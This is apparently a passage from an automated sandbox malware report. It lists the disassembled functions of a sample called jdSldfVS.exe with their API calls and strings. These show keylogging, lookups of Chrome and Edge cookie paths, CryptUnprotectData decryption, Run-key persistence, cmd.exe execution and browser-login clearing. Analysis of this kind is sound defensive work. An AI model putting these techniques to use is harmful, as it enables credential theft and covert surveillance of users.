                        • _free.LIBCMT ref: 0044354A
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\AppData\Roaming\jdSldfVS.exe
                        • API String ID: 2506810119-1144647072
                        • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                        • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                        • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                        • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                        Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                        • GetLastError.KERNEL32 ref: 0044B931
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorFileLastMultiWideWrite
                        • String ID: PkGNG
                        • API String ID: 2456169464-263838557
                        • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                        • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                        • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                        • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                        Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                        • String ID: /sort "Visit Time" /stext "$0NG
                        • API String ID: 368326130-3219657780
                        • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                        • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                        • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                        • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                        Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 004162F5
                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                          • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wcslen$CloseCreateValue
                        • String ID: !D@$okmode$PG
                        • API String ID: 3411444782-3370592832
                        • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                        • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                        • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                        • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                        Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                        Strings
                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                        • API String ID: 1174141254-1980882731
                        • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                        • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                        • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                        • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                        Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                        Strings
                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                        • API String ID: 1174141254-1980882731
                        • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                        • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                        • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                        • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                        Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                        • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                        • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTimewsprintf
                        • String ID: Offline Keylogger Started
                        • API String ID: 465354869-4114347211
                        • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                        • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                        Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                        • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTime$wsprintf
                        • String ID: Online Keylogger Started
                        • API String ID: 112202259-1258561607
                        • Opcode ID: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                        • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                        • Opcode Fuzzy Hash: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                        • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                        Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                        • API String ID: 481472006-3277280411
                        • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                        • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                        • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                        • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                        Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 00404F81
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                        • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                        Strings
                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$EventLocalThreadTime
                        • String ID: KeepAlive | Enabled | Timeout:
                        • API String ID: 2532271599-1507639952
                        • Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                        • Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                        Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: CryptUnprotectData$crypt32
                        • API String ID: 2574300362-2380590389
                        • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                        • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                        • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                        • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                        Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                        • GetLastError.KERNEL32 ref: 0044C296
                        • __dosmaperr.LIBCMT ref: 0044C29D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorFileLastPointer__dosmaperr
                        • String ID: PkGNG
                        • API String ID: 2336955059-263838557
                        • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                        • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                        • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                        • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                        Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                        • CloseHandle.KERNEL32(?), ref: 004051CA
                        • SetEvent.KERNEL32(?), ref: 004051D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandleObjectSingleWait
                        • String ID: Connection Timeout
                        • API String ID: 2055531096-499159329
                        • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                        • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                        • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                        • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                        Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                        Download Yara Rule
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exception@8Throw
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                        • API String ID: 2005118841-1866435925
                        • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                        • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                        • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                        • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                        Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                        Download Yara Rule
                        APIs
                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                        • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FormatFreeLocalMessage
                        • String ID: @J@$PkGNG
                        • API String ID: 1427518018-1416487119
                        • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                        • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                        • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                        • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                        Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,762337E0,?), ref: 0041384D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,762337E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                        • API String ID: 1818849710-1051519024
                        • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                        • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                        • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                        • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                        Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                        Download Yara Rule
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                        • String ID: bad locale name
                        • API String ID: 3628047217-1405518554
                        • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                        • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                        • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                        • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                        Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                        • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                        • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: Control Panel\Desktop
                        • API String ID: 1818849710-27424756
                        • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                        • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                        Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                        • ShowWindow.USER32(00000009), ref: 00416C61
                        • SetForegroundWindow.USER32 ref: 00416C6D
                          • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                          • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                          • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                        • String ID: !D@
                        • API String ID: 3446828153-604454484
                        • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                        • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                        • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                        • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                        Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell
                        • String ID: /C $cmd.exe$open
                        • API String ID: 587946157-3896048727
                        • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                        • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                        • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                        • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                        Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                        • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetLastInputInfo$User32.dll
                        • API String ID: 2574300362-1519888992
                        • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                        • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                        • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                        • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                        Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                        • Cleared browsers logins and cookies., xrefs: 0040C0F5
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                        • API String ID: 3472027048-1236744412
                        • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                        • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                        • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                        • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                        Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
